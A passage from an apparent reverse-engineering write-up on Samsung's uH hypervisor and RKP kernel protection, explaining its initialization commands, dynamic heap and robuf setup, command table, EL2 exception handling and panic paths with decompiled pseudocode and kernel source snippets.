0x03 init_cmd_id_0x03 -
0x04 init_cmd_initialize_dynamic_heap -

Let's take a look at command handler #0 called in uh_init. It is really simple: it sets the fault_handler field of uh_state. This structure contains the address of a kernel function that will be called when a fault is detected by the hypervisor.

int64_t init_cmd_init(saved_regs_t* regs) {
  // ...

  // Ensure the fault handler can only be set once.
  if (!uh_state.fault_handler && regs->x2) {
    // Save the value provided into `uh_state`.
    uh_state.fault_handler = rkp_get_pa(regs->x2);
    uh_log('L', "main.c", 161, "[*] uH fault handler has been registered");
  }
  return 0;
}

When uH calls this command, it won't do anything as the registers, including x2, are all set to 0. But this command will also be called later by the kernel, as can be seen in the rkp_init function in init/main.c.

static void __init rkp_init(void)
{
    uh_call(UH_APP_INIT, 0, uh_get_fault_handler(), kimage_voffset, 0, 0);
    // ...
}

Let's take a look at the fault handler registered by the kernel. It comes from the call to uh_get_fault_handler, which reveals that it is actually the uh_fault_handler function.

u64 uh_get_fault_handler(void)
{
    uh_handler_list.uh_handler = (u64) & uh_fault_handler;
    return (u64) & uh_handler_list;
}

We can see in the definition of the uh_handler_list structure that the argument of the fault handler will be an instance of the uh_handler_data structure, which contains the values of some EL2 system registers as well as the general registers stored in the uh_registers structure.

typedef struct uh_registers {
    u64 regs[31];
    u64 sp;
    u64 pc;
    u64 pstate;
} uh_registers_t;

typedef struct uh_handler_data{
    esr_t esr_el2;
    u64 elr_el2;
    u64 hcr_el2;
    u64 far_el2;
    u64 hpfar_el2;
    uh_registers_t regs;
} uh_handler_data_t;

typedef struct uh_handler_list{
    u64 uh_handler;
    uh_handler_data_t uh_handler_data[NR_CPUS];
} uh_handler_list_t;

The uh_fault_handler function will print information about the fault before calling do_mem_abort and finally panic.

void uh_fault_handler(void)
{
    unsigned int cpu;
    uh_handler_data_t *uh_handler_data;
    u32 exception_class;
    unsigned long flags;
    struct pt_regs regs;

    spin_lock_irqsave(&uh_fault_lock, flags);

    cpu = smp_processor_id();
    uh_handler_data = &uh_handler_list.uh_handler_data[cpu];
    exception_class = uh_handler_data->esr_el2.ec;

    if (!exception_class_string[exception_class]
        || exception_class > esr_ec_brk_instruction_execution)
        exception_class = esr_ec_unknown_reason;
    pr_alert("=============uH fault handler logging=============\n");
    pr_alert("%s",exception_class_string[exception_class]);
    pr_alert("[System registers]\n", cpu);
    pr_alert("ESR_EL2: %x\tHCR_EL2: %llx\tHPFAR_EL2: %llx\n",
         uh_handler_data->esr_el2.bits,
         uh_handler_data->hcr_el2, uh_handler_data->hpfar_el2);
    pr_alert("FAR_EL2: %llx\tELR_EL2: %llx\n", uh_handler_data->far_el2,
         uh_handler_data->elr_el2);

    memset(&regs, 0, sizeof(regs));
    memcpy(&regs, &uh_handler_data->regs, sizeof(uh_handler_data->regs));

    do_mem_abort(uh_handler_data->far_el2, (u32)uh_handler_data->esr_el2.bits, &regs);
    panic("%s",exception_class_string[exception_class]);
}

The other two APP_INIT commands are used during initialization of the hypervisor framework. They are not called by the kernel but by S-Boot before the kernel is actually loaded and executed.

In dtb_update, S-Boot will call command #2 for each memory node in the Device Tree Blob (DTB). The arguments of this call are the memory region address and its size. It will then call command #4, passing as arguments two pointers to local variables that will be filled in by the hypervisor.

int64_t dtb_update(...) {
  // ...
  dtb_find_entries(dtb, "memory", j_uh_add_dynamic_region);
  sprintf(path, "/reserved-memory");
  offset = dtb_get_path_offset(dtb, path);
  if (offset < 0) {
    dprintf("%s: fail to get path [%s]: %d\n", "dtb_update_reserved_memory", path, offset);
  } else {
    heap_base = 0;
    heap_size = 0;
    dtb_add_reserved_memory(dtb, offset, 0x87000000, 0x200000, "el2_code", "el2,uh");
    uh_call(0xC300C000, 4, &heap_base, &heap_size, 0, 0);
    dtb_add_reserved_memory(dtb, offset, heap_base, heap_size, "el2_earlymem", "el2,uh");
    dtb_add_reserved_memory(dtb, offset, 0x80001000, 0x1000, "kaslr", "kernel-kaslr");
    if (get_env_var(FORCE_UPLOAD) == 5)
      rmem_size = 0x2400000;
    else
      rmem_size = 0x1700000;
    dtb_add_reserved_memory(dtb, offset, 0xC9000000, rmem_size, "sboot", "sboot,rmem");
  }
  // ...
}

int64_t uh_add_dynamic_region(int64_t addr, int64_t size) {
  uh_call(0xC300C000, 2, addr, size, 0, 0);
  return 0;
}

void uh_call(...) {
  asm("hvc #0");
}

The command handler #2, which we named init_cmd_add_dynamic_region, adds a range of DDR memory to the dynamic_regions memlist, from which the uH "dynamic heap" region will later be carved. S-Boot uses it to indicate to the hypervisor which physical memory regions it can access once DDR has been initialized.

int64_t init_cmd_add_dynamic_region(saved_regs_t* regs) {
  // ...

  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
    return -1;
  }
  // Add the given memory range to the dynamic regions memlist.
  return memlist_add(&uh_state.dynamic_regions, regs->x2, regs->x3);
}

The command handler #4, which we named init_cmd_initialize_dynamic_heap, is used to finalize the list of dynamic memory regions and initialize the dynamic heap allocator from it. S-Boot calls it once all DDR memory has been added using the previous command. This function verifies its arguments, sets the starting physical address of the kernel to the very lowest DDR memory address, and finally calls initialize_dynamic_heap.

int64_t init_cmd_initialize_dynamic_heap(saved_regs_t* regs) {
  // ...

  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited || !regs->x2 || !regs->x3) {
    return -1;
  }
  // Set the start of kernel physical memory to the lowest DDR address.
  PHYS_OFFSET = memlist_get_min_addr(&uh_state.dynamic_regions);
  // Ensure the S-Boot pointers are not in hypervisor memory.
  base = check_and_convert_kernel_input(regs->x2);
  size = check_and_convert_kernel_input(regs->x3);
  if (!base || !size) {
    uh_log('L', "main.c", 188, "Wrong addr in dynamicheap : base: %p, size: %p", base, size);
    return -1;
  }
  // Initialize the dynamic heap allocator.
  return initialize_dynamic_heap(base, size, regs->x4);
}

initialize_dynamic_heap will first compute the dynamic heap base address and size. If those values are provided by S-Boot, they are used directly. If the size is not provided, it is calculated automatically. If the base address is not provided, a DDR memory region of the right size is carved automatically. The function then calls dynamic_heap_initialize, which saves the chosen range into global variables and initializes the list of heap chunks, similarly to the static heap allocator. It initializes three sparsemaps, physmap, ro_bitmap, and dbl_bitmap, that we will be detailing later. Finally, it initializes the robuf_regions memlist, the robuf sparsemap, and allocates a buffer to contain read-only pages to be used by the kernel.

int64_t initialize_dynamic_heap(uint64_t* base, uint64_t* size, uint64_t flag) {
  // Ensure the dynamic heap allocator hasn't already been initialized.
  if (uh_state.dynamic_heap_inited) {
    return -1;
  }
  // And mark it as initialized.
  uh_state.dynamic_heap_inited = 1;
  // The dynamic heap size can be provided by S-Boot, or calculated automatically.
  if (flag) {
    dynamic_heap_size = *size;
  } else {
    dynamic_heap_size = get_dynamic_heap_size();
  }
  // The dynamic heap base can be provided by S-Boot. In that case, the range provided is removed from the
  // `dynamic_regions` memlist. Otherwise, a range of the requested size is automatically removed from the
  // `dynamic_regions` memlist and is returned.
  if (*base) {
    dynamic_heap_base = *base;
    if (memlist_remove(&uh_state.dynamic_regions, dynamic_heap_base, dynamic_heap_size)) {
      uh_log('L', "main.c", 281, "[-] Dynamic heap address is not existed in memlist, base : %p", dynamic_heap_base);
      return -1;
    }
  } else {
    dynamic_heap_base = memlist_get_region_of_size(&uh_state.dynamic_regions, dynamic_heap_size, 0x200000);
  }
  // Actually initialize the dynamic heap allocator using the provided or computed base address and size.
  dynamic_heap_initialize(dynamic_heap_base, dynamic_heap_size);
  uh_log('L', "main.c", 288, "[+] Dynamic heap initialized base: %lx, size: %lx", dynamic_heap_base, dynamic_heap_size);
  // Copy the dynamic heap base address and size back to S-Boot.
  *base = dynamic_heap_base;
  *size = dynamic_heap_size;
  // Map the dynamic heap in the second stage at EL1 as writable.
  mapped_start = dynamic_heap_base;
  if (s2_map(dynamic_heap_base, dynamic_heap_size_0, UNKN1 | WRITE | READ, &mapped_start) < 0) {
    uh_log('L', "main.c", 299, "s2_map returned false, start : %p, size : %p", mapped_start, dynamic_heap_size);
    return -1;
  }
  // Create 3 new sparsemaps: `physmap`, `ro_bitmap` and `dbl_bitmap` mapping all the remaining DDR memory. The physmap
  // internal entries are also added to the protected ranges as they are critical to the hypervisor security.
  sparsemap_init("physmap", &uh_state.phys_map, &uh_state.dynamic_regions, 0x20, 0);
  sparsemap_for_all_entries(&uh_state.phys_map, protected_ranges_add);
  sparsemap_init("ro_bitmap", &uh_state.ro_bitmap, &uh_state.dynamic_regions, 1, 0);
  sparsemap_init("dbl_bitmap", &uh_state.dbl_bitmap, &uh_state.dynamic_regions, 1, 0);
  // Create a new memlist that will be used to allocate memory pages for page tables management. This memlist is
  // initialized with all the remaining DDR memory.
  memlist_init(&uh_state.page_allocator.list);
  memlist_add(&uh_state.page_allocator.list, dynamic_heap_base, dynamic_heap_size);
  // Create a new sparsemap mapping all the pages from the previous memlist.
  sparsemap_init("robuf", &uh_state.page_allocator.map, &uh_state.page_allocator.list, 1, 0);
  // Allocates a chunk of memory for the robuf allocator (RO pages for the kernel).
  allocate_robuf();
  // Unmap all the unused DDR memory that might remain below 0xa00000000.
  regions_end_addr = memlist_get_max_addr(&uh_state.dynamic_regions);
  if ((regions_end_addr >> 33) <= 4) {
    s2_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
    s1_unmap(regions_end_addr, 0xa00000000 - regions_end_addr);
  }
  return 0;
}

If the size is not provided by S-Boot, get_dynamic_heap_size is called. It first calculates and sets the robuf size: 1 MB per GB of DDR memory, plus 6 MB. Then it calculates and returns the dynamic heap size: 4 MB per GB of DDR memory, plus 6 MB, rounded up to a multiple of 2 MB.

uint64_t get_dynamic_heap_size() {
  // ...

  // Do some housekeeping on the memlist.
  memlist_merge_ranges(&uh_state.dynamic_regions);
  memlist_dump(&uh_state.dynamic_regions);
  // Calculate a first dynamic size, depending on the amount of DDR memory, to be added to a fixed robuf size.
  some_size1 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
  set_robuf_size(some_size1 + 0x600000);
  // Calculate a second and third dynamic sizes, to be added to the robuf size, to get the dynamic heap size.
  some_size2 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x100000);
  some_size3 = memlist_get_contiguous_gigabytes(&uh_state.dynamic_regions, 0x200000);
  dynamic_heap_size = some_size1 + 0x600000 + some_size2 + some_size3;
  // Ceil the dynamic heap size to 0x200000 bytes.
  return (dynamic_heap_size + 0x1fffff) & 0xffe00000;
}
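
As a worked example of our reading of this function, a device with 4 GB of DDR would end up with a 10 MB robuf and a 22 MB dynamic heap. The helper below is ours, not part of the binary:

#include <stdint.h>

/* Approximation of get_dynamic_heap_size for a device with `gb` gigabytes of DDR. */
static uint64_t approx_dynamic_heap_size(uint64_t gb, uint64_t* robuf_size) {
  const uint64_t MB = 0x100000;
  *robuf_size = gb * MB + 6 * MB;                           /* 1 MB per GB, plus 6 MB  */
  uint64_t heap_size = *robuf_size + gb * MB + gb * 2 * MB; /* 4 MB per GB, plus 6 MB  */
  return (heap_size + 0x1fffff) & ~0x1fffffULL;             /* ceil to a 2 MB boundary */
}

/* approx_dynamic_heap_size(4, &robuf) == 0x1600000 (22 MB), with robuf == 0xa00000 (10 MB). */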

allocate_robuf tries to allocate a region of robuf_size from the dynamic heap allocator that was initialized moments ago. If that is not possible, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init with this memory region as an argument. page_allocator_init initializes the sparsemap and everything that the page allocator will use. The page allocator and the "robuf" region are what will be used by RKP for handing out read-only pages to the kernel (for the data protection feature, for example).

int64_t allocate_robuf() {
  // ...

  // Ensure the dynamic heap allocator has been initialized.
  if (!uh_state.dynamic_heap_inited) {
    uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
    return -1;
  }
  // Ceil the robuf size to the size of a page.
  robuf_size = uh_state.page_allocator.robuf_size & 0xfffff000;
  // Allocate the robuf from the dynamic heap allocator.
  robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xfffff000, 0x1000);
  // If the allocation failed, use the last memory chunk from the dynamic heap allocator.
  if (!robuf_base) {
    dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
  }
  if (!robuf_base) {
    uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
    return -1;
  }
  // Clear the data cache for all robuf addresses.
  if (robuf_size) {
    offset = 0;
    do {
      zero_data_cache_page(robuf_base + offset);
      offset += 0x1000;
    } while (offset < robuf_size);
  }
  // Finally, initialize the page allocator using the robuf memory region.
  return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}

APP_RKP

The command handlers registered for APP_RKP are:

Command ID Command Handler Maximum Calls
0x00 rkp_cmd_init 0
0x01 rkp_cmd_start 1
0x02 rkp_cmd_deferred_start 1
0x03 rkp_cmd_write_pgt1 -
0x04 rkp_cmd_write_pgt2 -
0x05 rkp_cmd_write_pgt3 -
0x06 rkp_cmd_emult_ttbr0 -
0x07 rkp_cmd_emult_ttbr1 -
0x08 rkp_cmd_emult_doresume -
0x09 rkp_cmd_free_pgd -
0x0A rkp_cmd_new_pgd -
0x0B rkp_cmd_kaslr_mem 0
0x0D rkp_cmd_jopp_init 1
0x0E rkp_cmd_ropp_init 1
0x0F rkp_cmd_ropp_save 0
0x10 rkp_cmd_ropp_reload -
0x11 rkp_cmd_rkp_robuffer_alloc -
0x12 rkp_cmd_rkp_robuffer_free -
0x13 rkp_cmd_get_ro_bitmap 1
0x14 rkp_cmd_get_dbl_bitmap 1
0x15 rkp_cmd_get_rkp_get_buffer_bitmap 1
0x17 rkp_cmd_id_0x17 -
0x18 rkp_cmd_set_sctlr_el1 -
0x19 rkp_cmd_set_tcr_el1 -
0x1A rkp_cmd_set_contextidr_el1 -
0x1B rkp_cmd_id_0x1B -
0x20 rkp_cmd_dynamic_load -
0x40 rkp_cmd_cred_init 1
0x41 rkp_cmd_assign_ns_size 1
0x42 rkp_cmd_assign_cred_size 1
0x43 rkp_cmd_pgd_assign -
0x44 rkp_cmd_cred_set_fp -
0x45 rkp_cmd_cred_set_security -
0x46 rkp_cmd_assign_creds -
0x48 rkp_cmd_ro_free_pages -
0x4A rkp_cmd_prot_dble_map -
0x4B rkp_cmd_mark_ppt -
0x4E rkp_cmd_set_pages_ro_tsec_jar -
0x4F rkp_cmd_set_pages_ro_vfsmnt_jar -
0x50 rkp_cmd_set_pages_ro_cred_jar -
0x51 rkp_cmd_id_0x51 1
0x52 rkp_cmd_init_ns -
0x53 rkp_cmd_ns_set_root_sb -
0x54 rkp_cmd_ns_set_flags -
0x55 rkp_cmd_ns_set_data -
0x56 rkp_cmd_ns_set_sys_vfsmnt 5
0x57 rkp_cmd_id_0x57 -
0x60 rkp_cmd_selinux_initialized -
0x81 rkp_cmd_test_get_par 0
0x82 rkp_cmd_test_get_wxn 0
0x83 rkp_cmd_test_ro_range 0
0x84 rkp_cmd_test_get_va_xn 0
0x85 rkp_check_vmm_unmapped 0
0x86 rkp_cmd_test_ro 0
0x87 rkp_cmd_id_0x87 0
0x88 rkp_cmd_check_splintering_point 0
0x89 rkp_cmd_id_0x89 0

Let's take a look at command handler #0 called in uh_init. It simply initializes the maximal number of times that each command can be called (enforced by the "checker" function) by calling the rkp_init_cmd_counts function.

int64_t rkp_cmd_init() {
  // Enable panic when a violation is detected.
  rkp_panic_on_violation = 1;
  // Initialize the counters of commands executions.
  rkp_init_cmd_counts();
  cs_init(&rkp_start_lock);
  return 0;
}

Exception Handling

An important part of a hypervisor is its exception handling code. These functions are called on various events: faulting memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2 register. We have seen in vmm_init that the vector table is at vmm_vector_table. From the ARMv8 specifications, we know it has the following structure:

Address Exception Type Description
+0x000 Synchronous Current EL with SP0
+0x080 IRQ/vIRQ
+0x100 FIQ/vFIQ
+0x180 SError/vSError
+0x200 Synchronous Current EL with SPx
+0x280 IRQ/vIRQ
+0x300 FIQ/vFIQ
+0x380 SError/vSError
+0x400 Synchronous Lower EL using AArch64
+0x480 IRQ/vIRQ
+0x500 FIQ/vFIQ
+0x580 SError/vSError
+0x600 Synchronous Lower EL using AArch32
+0x680 IRQ/vIRQ
+0x700 FIQ/vFIQ
+0x780 SError/vSError

Our device has a 64-bit kernel executing at EL1, so the hypervisor calls should be dispatched to the exception handler at vmm_vector_table+0x400. But in the hypervisor, all the exception handlers end up calling the vmm_dispatch function with different arguments.

void exception_handler(...) {
  // ...

  // Save registers x0 to x30, sp_el1, elr_el2, spsr_el2.
  // ...
  // Dispatch the exception to the VMM, passing it the exception level and type.
  vmm_dispatch(<exc_level>, <exc_type>, &regs);
  // Clear the local monitor and return to the caller.
  asm("clrex");
  asm("eret");
}

The level and type of the exception that has been taken are passed to vmm_dispatch as arguments. For synchronous exceptions, it will call vmm_synchronous_handler and panic if it returns a non-zero value. For all other exception types, it simply logs a message.

int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  // If another core has called `vmm_panic`, panic on this core too.
  if (has_panicked) {
    vmm_panic(level, type, regs, "panic on another core");
  }
  // Handle the exception depending on its type.
  switch (type) {
    case 0x0: /* Synchronous */
      // For synchronous exception, call the appropriate handler and panic if handling failed.
      if (vmm_synchronous_handler(level, type, regs)) {
        vmm_panic(level, type, regs, "syncronous handler failed");
      }
      break;
    case 0x80: /* IRQ/vIRQ */
      uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
      break;
    case 0x100: /* FIQ/vFIQ */
      uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
      break;
    case 0x180: /* SError/vSError */
      uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
      break;
    default:
      return 0;
  }
  return 0;
}

vmm_synchronous_handler first gets the exception class by reading the ESR_EL2 register:

  • for HVC instruction executions, it calls uh_handle_command to dispatch it to the appropriate application command handler;
  • for trapped system register accesses, it lets other_msr_mrs_system decide whether the write is allowed or not, and then resumes execution or panics depending on the function's return value;
  • for instruction aborts from the kernel, specific aborts or aborts with a zero faulting address are skipped, otherwise, all other aborts result in a panic;
  • for data aborts from the kernel, it first checks if this is a write to a kernel page table, and if that's the case, it calls the rkp_lxpgt_write function corresponding to the target page table level. For translation faults at level 3, the fault is ignored if the address can be successfully translated (using AT S12E1R or AT S12E1W). For permission faults, the fault is ignored, and the TLBs are flushed if the address can be successfully translated (using AT S12E1W). Aborts with a zero faulting address are skipped, and all other aborts result in a panic.

int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
  // ...

  // ESR_EL2, Exception Syndrome Register (EL2).
  //
  // EC, bits [31:26]: Indicates the reason for the exception that this register holds information about.
  esr_el2 = get_esr_el2();
  switch (esr_el2 >> 26) {
    case 0x12: /* HVC instruction execution in AArch32 state */
    case 0x16: /* HVC instruction execution in AArch64 state */
      // For HVC instruction execution, check if the HVC ID starts with 0xc300cXXX.
      if ((regs->x0 & 0xfffff000) == 0xc300c000) {
        app_id = regs->x0;
        cmd_id = regs->x1;
        // Reset the injection value for the current CPU.
        cpu_num = get_current_cpu();
        if (cpu_num <= 7) {
          uh_state.injections[cpu_num] = 0;
        }
        // Dispatch the call to the application command handler.
        uh_handle_command(app_id, cmd_id, regs);
      }
      return 0;
    case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
      // For trapped system register accesses, first ensure that it is a write. If that's the case, call a handler to
      // decide whether the operation is allowed or not.
      //
      // The handler gets the value that was being written to the system register from the saved general registers.
      // Depending on which system register is being written, it will check if specific bits have a fixed value. If the
      // write operation is allowed, ELR_EL2 is updated to make it point to the next instruction. If the operation is
      // denied, the hypervisor will panic.
      //
      //   - Direction, bit [0] = 0: Write access, including MSR instructions.
      //   - Op0/Op2/Op1/CRn/Rt/CRm, bits[21:1]: Values from the issued instruction.
      if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(&regs->x0, esr_el2_1 & 0x1ffffff)) {
        return 0;
      }
      vmm_panic(level, type, regs, "other_msr_mrs_system failure");
      return 0;
    case 0x20: /* Instruction Abort from a lower EL */
      // ...
      // For instruction aborts coming from a lower EL, if the bits patterns below all match and the number of
      // instruction aborts skipped is less than 9, then the number is incremented and the abort is skipped.
      //
      //   - IFSC, bits [5:0] = 0b000111: Translation fault, level 3.
      //   - S1PTW, bit [7] = 0b1: Fault on the stage 2 translation of an access for a stage 1 translation table walk.
      //   - EA, bit [9] = 0b0: Not an External Abort.
      //   - FnV, bit [10] = 0b0: FAR is valid.
      //   - SET, bits [12:11] = 0b00: Recoverable state (UER).
      if (should_skip_prefetch_abort() == 1) {
        return 0;
      }
      // If the faulting address is 0, the fault is injected back to be handled by EL1 and the injection value is set
      // for the current CPU. Otherwise, the hypervisor panics.
      if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
        print_vmm_registers(regs);
        return 0;
      }
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
      return 0;
    case 0x21: /* Instruction Abort taken without a change in EL */
      // For instruction aborts taken without a change in EL, meaning hypervisor faults, it panics.
      uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1ffffff);
      vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
    case 0x24: /* Data Abort from a lower EL */
      // For data aborts coming from a lower EL, it first calls `rkp_fault` to try to detect page table writes. That is
      // when the faulting instruction is in the kernel text and is a `str x2, [x1]`. In addition, the x1 register must
      // point to a page table entry. Then, depending on the page table level, it calls a different function:
      //
      //   - rkp_l1pgt_write for level 1 PTs.
      //   - rkp_l2pgt_write for level 2 PTs.
      //   - rkp_l3pgt_write for level 3 PTs.
      //
      // If the kernel page table write is allowed, the PC is advanced to the next instruction.
      if (!rkp_fault(regs)) {
        return 0;
      }
      // For translation faults at level 3, convert the faulting IPA into a kernel VA. Then call the `el1_va_to_pa`
      // function that will use the AT S12E1R/W instruction to translate it to a PA, as if the access was coming from
      // EL1. If the address can be translated successfully, we return immediately.
      //
      // DFSC, bits [5:0] = 0b000111: Translation fault, level 3.
      if ((esr_el2 & 0x3f) == 0b000111) {
        // HPFAR_EL2, Hypervisor IPA Fault Address Register.
        //
        // Holds the faulting IPA for some aborts on a stage 2 translation taken to EL2.
        va = rkp_get_va(get_hpfar_el2() << 8);
        cs_enter(&s2_lock);
        // el1_va_to_pa returns 0 if the address can be translated.
        res = el1_va_to_pa(va, &ipa);
        if (!res) {
          uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
          cs_exit(&s2_lock);
          return 0;
        }
        cs_exit(&s2_lock);
      }
      // For permission faults at any level, convert the faulting IPA into a kernel VA. Then use the AT S12E1W
      // instruction to translate it to a PA, as if the access was coming from EL1. If the address can be translated
      // successfully, invalidate the TLBs and return immediately.
      //
      //   - WnR, bit [6] = 0b1: Abort caused by an instruction writing to a memory location.
      //   - DFSC, bits [5:0] = 0b0011xx: Permission fault, any level.
      if ((esr_el2 & 0x7c) == 0x4c) {
        va = rkp_get_va(get_hpfar_el2() << 8);
        at_s12e1w(va);
        // PAR_EL1, Physical Address Register.
        //
        // F, bit [0] = 0: Successful address translation.
        if ((get_par_el1() & 1) == 0) {
          print_el2_state();
          invalidate_entire_s1_s2_el1_tlb();
          return 0;
        }
      }
      // ...
      // For all other data aborts, call the same handler as for instruction aborts from a lower EL.
      if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
        vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
      } else {
        print_vmm_registers(regs);
      }
      return 0;
    case 0x25: /* Data Abort taken without a change in EL */
      // For data aborts taken without a change in EL, meaning hypervisor faults, it panics.
      vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
      return 0;
    default:
      return -1;
  }
}

The vmm_panic function, called when the hypervisor needs to panic, first logs the panic message, exception level, and type. If the MMU is disabled or the exception is not synchronous or taken from EL2, it then calls uh_panic. Otherwise, it calls uh_panic_el1.

crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
  // ...

  uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
  cs_enter(&panic_cs);
  // Print the panic message.
  uh_log('L', "vmm.c", 1175, "message: %s", message);
  // Print the exception level.
  switch (level) {
    case 0x0:
      uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
      break;
    case 0x200:
      uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
      break;
    case 0x400:
      uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
      break;
    case 0x600:
      uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
      break;
    default:
      uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
      break;
  }
  // Print the exception type.
  switch (type) {
    case 0x0:
      uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
      break;
    case 0x80:
      uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
      break;
    case 0x100:
      uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
      break;
    case 0x180:
      uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
      break;
    default:
      uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
      break;
  }
  print_vmm_registers(regs);
  // SCTLR_EL1, System Control Register (EL1).
  //
  // M, bit [0] = 0b0: EL1&0 stage 1 address translation disabled.
  if ((get_sctlr_el1() & 1) == 0 || type != 0 /* Synchronous */ ||
      (level == 0 /* Current EL with SP0 */ || level == 0x200 /* Current EL with SPx */)) {
    has_panicked = 1;
    cs_exit(&panic_cs);
    // Reset the device immediately if the panic originated from another core.
    if (!strcmp(message, "panic on another core")) {
      exynos_reset(0x8800);
    }
    // Call `uh_panic` which will ultimately reset the device.
    uh_panic();
  }
  // Call `uh_panic_el1` which will execute the registered kernel fault handler.
  uh_panic_el1(uh_state.fault_handler, regs);
  return cs_exit(&panic_cs);
}

uh_panic calls print_state_and_reset which logs the EL1 and EL2 system register values, and the hypervisor and kernel stack contents. It copies a textual version of those into the "bigdata" region, and then reboots the device.

void uh_panic() {
  uh_log('L', "main.c", 482, "uh panic!");
  print_state_and_reset();
}

uh_panic_el1 fills the uh_handler_data structure, which we have seen previously, with the system and general register values. It then sets ELR_EL2 to the kernel fault handler so that it will be called upon executing the ERET instruction.

int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
  // ...

  // Ensure that a kernel fault handler is registered.
  uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
  if (!fault_handler) {
    uh_log('L', "vmm.c", 113, "uH handler did not registered");
    uh_panic();
  }
  // Print EL2 system registers values.
  print_el2_state();
  // Print EL1 system registers values.
  print_el1_state();
  // Print the content of the hypervisor and kernel stacks.
  print_stack_contents();
  // Set the injection value for the current CPU, unless it has already been set, in which case it panics.
  cpu_num = get_current_cpu();
  if (cpu_num <= 7) {
    something = cpu_num - 0x21530000;
    if (uh_state.injections[cpu_num] == something) {
      uh_log('D', "vmm.c", 99, "Injection locked");
    }
    uh_state.injections[cpu_num] = something;
  }
  // Fill the `uh_handler_data` structure with the registers values.
  handler_data = &fault_handler->uh_handler_data[cpu_num];
  handler_data->esr_el2 = get_esr_el2();
  handler_data->elr_el2 = get_elr_el2();
  handler_data->hcr_el2 = get_hcr_el2();
  handler_data->far_el2 = get_far_el2();
  handler_data->hpfar_el2 = get_hpfar_el2() << 8;
  if (regs) {
    memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
  }
  // Finally, set ELR_EL2 to the kernel fault handler to execute it on exception return.
  set_elr_el2(fault_handler->uh_handler);
  return 0;
}

Digging Into RKP

Now that we have seen how the hypervisor is initialized and how exceptions are handled, let's see how the RKP-specific parts are started.

Startup

RKP startup is performed in two stages using two different commands:

  • command #1 (start): called by the kernel in start_kernel, right after mm_init;
  • command #2 (deferred start): called by the kernel in kernel_init, right before starting init.

RKP Start

On the kernel side, the first startup-related command is called in rkp_init.

static void __init rkp_init(void)
{
    // ...
    rkp_init_data.vmalloc_end = (u64)high_memory;
    rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
    rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
    rkp_init_data.no_fimc_verify = 1;
#endif
    rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
    rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
    // ...
    uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}

This function fills a data structure of type rkp_init_t that is given to the hypervisor. It contains information about the kernel memory layout.

rkp_init_t rkp_init_data __rkp_ro = {
    .magic = RKP_INIT_MAGIC,
    .vmalloc_start = VMALLOC_START,
    .no_fimc_verify = 0,
    .fimc_phys_addr = 0,
    ._text = (u64)_text,
    ._etext = (u64)_etext,
    ._srodata = (u64)__start_rodata,
    ._erodata = (u64)__end_rodata,
     .large_memory = 0,
};
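For reference, here is a sketch of what the rkp_init_t structure could look like, reconstructed solely from the fields referenced in rkp_init and rkp_start. The field order, the exact integer widths, and the comments are assumptions; fields not used in this post are omitted.

typedef struct rkp_init {
    u32 magic;          /* RKP_INIT_MAGIC, checked by rkp_start */
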